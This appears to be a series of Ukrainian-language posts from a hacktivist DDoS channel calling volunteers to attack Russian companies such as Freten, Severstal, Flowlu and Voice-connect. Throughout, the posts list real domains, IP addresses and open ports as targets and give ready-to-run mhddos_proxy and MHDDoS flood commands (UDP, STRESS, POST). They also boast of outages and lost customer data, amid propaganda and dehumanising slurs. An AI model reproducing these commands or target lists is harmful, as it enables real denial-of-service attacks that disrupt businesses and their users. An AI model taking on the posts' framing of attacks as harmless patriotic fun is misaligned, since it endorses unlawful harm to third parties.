Для тих, хто з комп'ютером взаємодіє частіше — я закінчую працювати над інструкцією ддос "DDoS від А до Я", основний інструмент — це mhddos і його модифікації. Так як це найпотужніший інструмент на даний момент.
ЗБІР о 12.00!
Доброго вечора, Гайдамаки!
Продовжуємо атакувати Фретен біржу. Сервіс працює, але з перебоями. Іноді буває, що ддос гуард вічно грузиться, але ніяк не прогрузиться, іноді сайт з'являється, але без CSS... Коротко кажучи, ми молодці, атаку не зупиняємо, результати дуже хороші😁
Також зараз не рекомендую ігнорувати тривоги, кацапи бушують...😓 І не розповсюджуйте інформацію "шо де в кого бахнуло", я звертаюся до всіх вас, так як ви перебуваєте в багатьох чатах, і навіювати паніку не потрібно.
Знову всіх вітаю, сподіваюсь, ви готові?😏
Атакуємо російську фріланс біржу Фретен — не найпопулярніший сервіс, але через нього теж багато людей працюють, і потік грошей там великий. Такі сервіси, зазвичай, платять налоги в держ. казну РФ, а значить фінансово підтримують ворога. Думаю більше розповідати тут нічого. ЧАВИМО РАШИСТІВ🤬
freten.ru
robroy.ru
37.46.131.229
[21/TCP, 22/TCP, 443/TCP, 1500/TCP] —> сайт*
[53/UDP, 123/UDP]
mail.freten.ru
mail.robroy.ru
37.46.131.229
[25/smtp, 110/pop3, 143/imap, 465/ssl/smtp, 587/smtp, 993/ssl/imap, 995/ssl/pop3] —> пошта*
82.146.43.2
94.250.248.160
[53/UDP] —> DNS-servers*
Команда для Docker:docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table
Команда для mhddos_proxy:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://freten.ru https://mail.freten.ru https://robroy.ru https://mail.robroy.ru -t 2000 --rpc 2000 -p 900 --http-methods STRESS POST --tablepython runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table
python runner.py-c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table
Команди для MHDDoS:
python runner.py https://freten.ru https://mail.freten.ru https://robroy.ru https://mail.robroy.ru -t 2000 --rpc 2000 -p 900 --http-methods STRESS POST --table
python3 start.py UDP 37.46.131.229:53 5000 10000 true(тут синхронізація часу(123 порт), тому не пріорітетна команда)*
python3 start.py UDP 94.250.248.160:53 5000 10000 true
python3 start.py UDP 82.146.43.2:53 5000 10000 true
python3 start.py UDP 37.46.131.229:123 5000 10000 true
python3 start.py STRESS https://freten.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://robroy.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py POST https://mail.freten.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py POST https://mail.robroy.ru 6 1000 proxy.txt 10000 5000 true
Читать полностью…
Доброго ранку, Гайдамаки!💡
Сьогодні ми атакуємо сервери компанії Северсталь(severstal.com). Це доволі важливий сервіс, який постачає метал (і не тільки) по всій країні окупантів, також в них є багато дочірніх компаній, до яких руки теж дойдуть😏
Сервіс дуже стійкий, тому потрібна максимальна ваша активність. Поки немає що розказувати — до бою:
217.175.24.79
[443/TCP] —> IIS server*
217.175.23.242
[443/TCP] —> IIS server*
217.175.23.8
[443/TCP] —> IIS server*
217.175.24.189
[443/TCP] —> IIS server*
217.175.24.192
[443/TCP] —> IIS server*
217.175.24.93
217.175.24.74
217.175.24.39
217.175.24.21
217.175.24.200
[443/ssl-TCP] —> сервери аутентифікації користувачів в особистий кабінет (функція HTTP API також на цих айпі)
84.38.185.177
[21/TCP, 22/TCP, 80/TCP, 443/TCP, 5432/TCP, 9100/TCP] —> PostgreSQL DB (висить БД)
217.175.23.3
217.175.23.4
[53/UDP] —> ISC Bind v: 9.3.6-P1
217.175.18.117
13.80.145.65
217.175.25.190
[53/UDP] —> DNS-servers
Команда для Docker:docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table
Команда для mhddos_proxy:python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table
python runner.py-c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table
Команди для MHDDoS:python3 start.py UDP 217.175.23.3:53 5000 10000 true
Атака на Северсталь буде довгою, але хвилями — тому запасайтесь терпінням😉👌
python3 start.py UDP 217.175.23.4:53 5000 10000 true
python3 start.py UDP 217.175.18.117:53 5000 10000 true
python3 start.py UDP 13.80.145.65:53 5000 10000 true
python3 start.py UDP 217.175.25.190:53 5000 10000 true
Доброго ранку, Гайдамаки!⚔️
Сьогодні атакуємо вже сервіси Фловлу. Це сервіс-органайзер для бізнес планування. Він складається з різних "боксів", які виконують певні функції — синхронізація заміток, канали пошти, синзронізація з різними онлайн-гаманцями, планування подій, архіви для файлів і ще багато різних ніштяків😏
Важливі порти для атаки — поштові. Як я вже казав в попередньому пості: "Також, хочу сказати, що ми доволі потужно атакували їх поштові канали звязку через порти 25, 110, 145, 993, 995, тобто через в основному протоколи STMP і POP3. Такі атаки є важкими для відновлення ворогу, тому завтра спробуємо повторити досвід"
flowlu.ru
www.flowlu.ru
178.170.244.102
[all ports filtered] —> все фільтрують, по тсп не атакуємо тут*
mx.flowlu.ru
95.213.248.77 —> висить їх БД
[22/TCP, 3306/TCP, 9100/TCP(filtered), 9998/TCP(filtered)]
legal.flowlu.ru
complitech.flowlu.ru
artgorka.flowlu.ru
acorn.flowlu.ru
labx.flowlu.ru
hc.flowlu.ru
flamingo.flowlu.ru
ironplastgroup.flowlu.ru
relgroup.flowlu.ru
ginoice.flowlu.ru
ronavi.flowlu.ru
pipe.flowlu.ru
my.flowlu.ru
trustyhost.flowlu.ru
37.200.70.155
[22/TCP, 25/TCP]
DNS-servers:
ns1 —> 31.177.80.41 [53/UDP]
ns2 —> 89.111.166.6 [53/UDP]
Команда для Docker:docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://flowlu.ru https://my.flowlu.ru/register https://flowlu.ru/services/tasks/ https://flowlu.ru/prices/ https://flowlu.ru/blog/ http://178.170.244.102/phpmyadmin/ -t 2500 --rpc 1500 -p 900 --http-methods STRESS POST --table
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table
Команда для mhddos_proxy:python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table
python runner.py https://flowlu.ru https://my.flowlu.ru/register https://flowlu.ru/services/tasks/ https://flowlu.ru/prices/ https://flowlu.ru/blog/ http://178.170.244.102/phpmyadmin/ -t 2500 --rpc 1500 -p 900 --http-methods STRESS POST --table
python runner.py-c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table
Команди для MHDDoS:python3 start.py UDP 31.177.80.41:53 5000 10000 true
Сервіс доволі вразливий, одразу видно, що його не атакували взагалі. Що ж, потрібно виправляти😊
python3 start.py UDP 89.111.166.6:53 5000 10000 true
python3 start.py STRESS https://flowlu.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://my.flowlu.ru/register 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://flowlu.ru/services/tasks/ 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://flowlu.ru/prices/ 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://flowlu.ru/blog/ 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS http://178.170.244.102/phpmyadmin/ 6 1000 proxy.txt 10000 5000 true
Update: 17:58 —> статичні команди відновлено. Нажаль, всі вразливі порти почали фільтрувати, атакуємо до вечора, далі ціль на ніч**
Update: 11:07 —> тимчасово використовуємо старі команди, прописані вручну — статичні команди для атак накрились**
Читать полностью…Доброї ночі, Гайдамаки і Гайдамачки!😁
Вітаємо з Великоднем! Сподіваюсь, що сьогодні ви добре відпочили, так як таргетів не було — рахуйте, що це аванс, так як відпочивати під час війни ми можемо рідко😴
Минула наша атака на сервіси Неофона не була марною. Зараз вони вже стали на ноги, хоча сервіс пів доби лежав мінімум і багато бізнес компаній не мали до нього доступу=втрата грошей. Також, хочу сказати, що ми доволі потужно атакували їх поштові канали звязку через порти 25, 110, 145, 993, 995, тобто через в основному протоколи STMP і POP3. Такі атаки є важкими для відновлення ворогу, тому завтра спробуємо повторити досвід.
Далі, буде атака на ще один сервіс з бізнес сектору рашистів, цього разу вже не зовсім телефонія. Ціль вразлива і доволі велика, тому будемо атакувати спільно з іншою ddos-групою😜
Збір о 10 ранку! ВАЖЛИВА ЦІЛЬ!
Гайдамаки, вітаю!
Звісно, щонеділі пишучи цей пост про вечір кіно, я хочу одного разу привітати вас з повною перемогою України. Всі ми впевнені та знаємо, що війна скоро закінчиться.
Ще один тиждень невпинної боротьби на кіберфронті підійшов до кінця.
Тому, поки орки грають у свої улюблені ігри "Розірвусь на шматки", "Знайди чорний пакет", "Хованки і Джавелін" або "Мама зніміть мене з дерева", ми пропонуємо вам знову вмоститися у кріслі з гарячими напоями та провести вечір у затишній компанії, переглядаючи фільм "Джентельмени". Як і завжди, перегляд фільму буде у перерві між вибором цілей.
Збір відбудеться о 20:30
Всім гарного настрою! Слава Україні!
Доброго дня, Гайдамаки!🤗
Останні кілька днів ми атакували сервіси войс-конект, і, скажу вам чесно, атака вийшла доволі потужна, тривалістю в кілька діб — це фатально для бізнесу. Зараз їх компанія перейшли на клауд іншої бізнес-компанії, але таку ціль ми вже не подужаємо. В будь-якому випадку це призвело до паніки всіх їх клієнтів і зараз вони понесли великі втрати. Що ж, тоді продовжуємо роботу над бізнес-сервісами окупантів. Потрібно зменшити спонсорування війни рашистів. А також давайте нагадаємо, що ми зробили за останні кілька тижнів😊
Перша хвиля атак Гайдамаків "Рейди на телефонії рашистів" — ТЕЛЕФІН:
Ми атакували Телефін. У цьому випадку, наслідками нашої атаки ворогом було витрачено доволі солідну суму грошей на QRATOR-захист. Цей тип захисту доволі ефективний, але також, одночасно з цим, — дууже дорогий😈
Друга хвиля атак Гайдамаків "Рейди на телефонії рашистів" — ГРАВІТЕЛ:
Гравітел. Тут ми знищили основні, а також додаткові сервіси телефонії. Сервери не працювали кілька днів. У них був вибір: або втрачати кошти, поки сервіс лежить, або поставити захист, так само, як Телефін. Вони обрали перший варіант.
Третя хвиля атак Гайдамаків "Рейди на телефонії рашистів" — КАРАТ:
Далі атака на Карат-телефонію та Інсайд-тел. Саме в цей момент ці компанії обєднувались в одну (інтеграція Інсайда в Карат), ми трішки завадили цьому👌
Четверта хвиля атак Гайдамаків "Рейди на телефонії рашистів" — ВОЙС-КОНЕКТ:
Найдовша атака була саме на сервіси Войс-конект — 5 днів. Чому так довго? В першу чергу нашим завданням було заставити їх зробити так само як Телефін, а саме витратити кругленьку суму на підтримку свого сервісу. Довго ми чекали, поки будуть хоч якісь дії.. І ось, сьогодні вони перенесли свою БД на клауд. На це вони теж витратили трішки грошенят.
Також була безрезультатна атака на Сбербанк (спільно з іншими групами), атака на аеропорт Іркутська, атака на росказну, ну і, звісно, доволі вдала атака Айті армії на системи маркування ЧЗ, в якій ми допомогли їм.
Але зараз основний акцент і вектор атак нашого угрупування — це бізнес сектор РФ! Чекайте вказівок. Ціль на ніч✨
Збір — 22.00!!!
Увага!!! Зараз прошу всіх максимально атакувати по UDP!
Знаю, ви стомились атакувати 2 день підряд один сервіс, але лише точковими ударами, ми можем реально мати вплив на економіку рашистів👌
www.voice-connect.ru
voice-connect.ru
my.voice-connect.ru
billing.voice-connect.ru
home.voice-connect.ru
185.248.100.60
[22/TCP, 25/TCP, 111/TCP, 443/TCP]
77.244.214.121
[22/TCP, 25/TCP, 443/TCP]
95.163.87.128
[22/TCP, 1720/TCP, 3306/TCP, 5060/TCP]
195.88.209.73
[22/TCP, 443/TCP, 8080/TCP]
91.217.20.20
194.67.73.81
91.217.21.20
89.104.95.35
193.232.146.1
[53/UDP]
Команда для Docker:docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table
(прошу зараз атакувати саме командою вище)***
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --tableКоманда для mhddos_proxy:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://home.voice-connect.ru http://home.voice-connect.ru https://my.voice-connect.ru -t 2500 --rpc 1500 -p 900 --http-methods STRESS POST --table
python runner.py
-c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table
python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --tableКоманди для MHDDoS:
python runner.py https://home.voice-connect.ru http://home.voice-connect.ru https://my.voice-connect.ru -t 2500 --rpc 1500 -p 900 --http-methods STRESS POST --table
python3 start.py UDP 91.217.20.20:53 5000 10000 true(вище пріорітетні зараз команди)***
python3 start.py UDP 194.67.73.81:53 5000 10000 true
python3 start.py UDP 91.217.21.20:53 5000 10000 true
python3 start.py UDP 89.104.95.35:53 5000 10000 true
python3 start.py UDP 193.232.146.1:53 5000 10000 true
python3 start.py POST 95.163.87.128:3306 6 1000 proxy.txt 10000 10000 trueПриходиться часто корегувати ціль, а це значить, що вони постійно стараються обходити наші атаки — тобто ми все правильно робимо, продовжуємо, поки не ляжуть повністю😉 Читать полностью…
python3 start.py STRESS https://home.voice-connect.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS http://home.voice-connect.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://my.voice-connect.ru 6 1000 proxy.txt 10000 5000 true
Ну що гайдамаки? Слава Україні.
Ще один продуктивний тиждень позаду. Останній тиждень було багато гарних подій.
Цього тижня руський воєнний корабель знайшов своє місце у цьому світі, а саме на дні моря.
Наші хлопці єб₴#₴ть ворога так, що він навіть у ві сні здригається холодними українськими ночами.
До речі ви знали, що з боку рашиської клоаки, крейсер Москва потонув через залишений недопалок? І вони це їдять😂Бойовий крейсер,флагман рашиської орди, з офіцерським складом 66 чоловік допустив, щоб один з орків ніби то закурив поряд з боєкомплектом. Робимо висновки панове. Вони постійно кричать про свою силу та мужність, а у самих постійно на фронті одна магія: кораблі самі тонуть, танки самі вибухають, жд шляхи самі ламаються, в решті решт їхня орда сама по собі гине. Так чим тут пишатися? За їхньою думкою ми, ще навіть нічого проти них не зробили😂Що ж буде коли ми за них візьмемося?
Тому на цій прекрасній ноті оголошуємо кіно-вечір знову. Пропоную заварити чашечку кави та прийняти участь у щонедільній кіно-зустрічі у нашому діскорд каналі. Пропонуємо у нашій теплій компанії переглянути досить цікавий фільм "Легенда". Та під час перегляду думкою лишній раз посилати рашиський воєнний кораблель, самі знаєте куди. Будемо сподіватися у пеклі їм більше сподобається ніж на нашій землі 🗡 🇺🇦
Звісно,як завжди , перегляд фільму буде в перерві між вибором цілей.
Зустріч о 20:30
Discord:
https://discord.gg/UyqBRprgZt
Перемога за нами🇺🇦
Слава Україні 🇺🇦
Доброї ночі, гайдамаки!
Хочеться сказати, що атака удалась на славу😜
Зараз в них злетіла база даних, можливо вони навіть втратили багато інформації про своїх клієнтів)) Тому продовжуємо атаку, далі тримаємо їх довго, можливо кілька днів, або менше — залежить від ситуації, буду давати міні коментарі в постах з цілями біля часу апдейту (в кінці).
Все буде Україна! Нехай ця компанія відчує втрати і перестануть підтрмувати економіку окупантів🤬
Доброго дня, гайдамаки😎
Сьогодні ми атакували дві компанії бізнес телефонії рашистів. Скажу прямо, ми не змогли добити їх повністю, але все ж таки інтеграцію однієї компанії в іншу зробити тепер буде важче. Адже ми повалили саме систему реєстрації і логіну в акаунти користувачів.
Тепер готуємо нову атаку, і цього разу попрошу зібратись з силами, адже ціль доволі вразлива і потрібно бити різко - поки вони не почали реагувати. Тому що атака на карат була вночі, коли кібервоїнів наших мало, а значить систему ми не встигли зафлудити.
Якщо коротко - ЗБІР В 22.00, ГОТУЙТЕСЬ😉👌
Гайдамаки, увага!
Сбербанк почали фільтрувати і закривати всі порти, тому переходимо на атаку тільки по url. Команди в пості вище відредаговано, тепер там актуальна інформація.
Також, для зручності, коли пост відкореговано і команди змінено, — вкінці поста буде надпис, коли оновлено його. Це потрібно для того, щоб було легше орієнтуватись на актуальність інформації.
Продовжуємо атаку, якщо є питання, задавайте їх в коментарях, я їх всіх перечитую. Бажаю гарно повеселитись))